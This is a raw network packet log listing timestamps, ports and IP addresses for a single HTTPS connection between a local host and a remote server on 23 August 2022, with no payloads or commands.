Aug 23, 2022 03:43:41.959105968 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.959125042 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.959141016 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.959157944 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.959191084 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.959208012 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.959264994 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.959471941 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.959491014 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.959507942 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.959526062 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.959542990 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.959585905 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.959604025 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.959642887 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.959661007 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.959680080 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.959697008 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.959714890 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.959943056 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.959959030 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.959978104 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.959996939 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960014105 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960031986 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960050106 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960102081 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960123062 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960268974 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960288048 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960304976 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960382938 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960401058 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960417986 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960480928 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960499048 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960517883 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960589886 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960608006 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960627079 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960645914 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960661888 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960679054 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960695982 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960712910 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960731030 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960788012 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960805893 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960822105 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960839033 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960856915 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960870028 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960913897 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960932016 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.960978985 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961025953 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961042881 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961061001 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961110115 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961144924 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961163998 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961179972 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961199999 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961219072 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961246967 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961262941 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961281061 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961297035 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961399078 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961416960 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961472034 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961489916 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961508989 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961551905 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961580992 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961671114 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961710930 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961728096 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961745024 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961761951 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961779118 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961796999 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961813927 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961864948 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961908102 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961925030 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961944103 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961961031 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.961977959 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962006092 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962050915 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962068081 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962086916 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962106943 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962126017 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962143898 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962160110 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962177992 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962196112 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962213039 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962229967 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962292910 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962347031 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962364912 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962404966 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962420940 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962439060 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962456942 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962474108 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962491035 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962507963 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962548971 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962567091 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962584019 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962603092 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962620020 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962636948 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962656021 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962671995 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962690115 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962707043 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962726116 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962774038 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962796926 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962815046 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962832928 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962847948 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962861061 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962898970 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962917089 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962934017 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962961912 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962977886 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.962996006 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963069916 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963114023 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963133097 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963150978 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963169098 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963188887 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963232040 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963253021 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963269949 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963392973 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963413000 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963469982 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963488102 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963505983 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963525057 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963542938 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963561058 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963577032 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963593006 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963609934 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963622093 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963663101 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963676929 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963690042 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963704109 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963746071 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963766098 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963784933 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963802099 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963820934 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963836908 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963862896 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963881016 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963897943 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963916063 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963933945 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963951111 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963970900 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.963988066 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964061975 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964099884 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964145899 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964163065 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964210987 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964227915 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964246035 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964262962 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964281082 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964390039 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964407921 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964425087 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964428902 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.964445114 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964459896 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964478016 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964497089 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964514017 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964555025 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964574099 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964592934 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964611053 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964628935 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964648008 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964663982 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964680910 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964713097 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964730024 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964747906 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964906931 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964925051 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964941978 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.964945078 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.964982986 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965017080 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965034008 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965133905 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.965192080 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965209961 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965226889 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965245962 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965262890 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965280056 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965308905 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965339899 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.965348005 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965382099 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965399981 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965418100 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965456963 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965473890 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965492964 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965509892 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965544939 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965684891 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965703011 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965719938 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965740919 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965755939 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965773106 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965790033 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965806961 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965823889 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965842962 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965859890 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965878010 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965894938 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965919971 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.965931892 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965951920 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965969086 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.965987921 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966005087 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966022968 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966039896 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966058016 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966074944 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966090918 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966104984 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.966109991 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966128111 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966146946 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966164112 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966181993 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966214895 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966236115 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966253042 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966269016 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966305971 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.966396093 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966449022 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966468096 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966562033 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966579914 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966597080 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966626883 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966645002 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966706991 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966726065 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966742992 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966770887 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.966784954 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966801882 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966814995 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966834068 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966846943 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966878891 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966897011 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.966922045 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.967104912 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.967140913 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.967288017 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.967503071 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.967534065 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.967685938 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.967737913 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.967756033 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.967816114 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.967878103 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.967932940 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.967983961 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.968041897 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.968048096 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.968080044 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.968116045 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.968153000 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.968252897 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.968290091 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.968327045 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.968364000 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.968389034 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.968405008 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.968446970 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.968481064 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.968513012 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.968550920 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.968585968 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.968621969 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.968656063 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.968691111 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.968728065 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.968761921 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.968767881 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.968800068 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.968835115 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.968872070 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.968907118 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.968943119 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.968982935 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.968987942 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.969018936 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.969055891 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.969095945 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.969136000 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.969189882 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.969193935 CEST	64969	443	192.168.2.3	142.250.184.42
Aug 23, 2022 03:43:41.969228029 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.969263077 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.969299078 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.969337940 CEST	443	64969	142.250.184.42	192.168.2.3
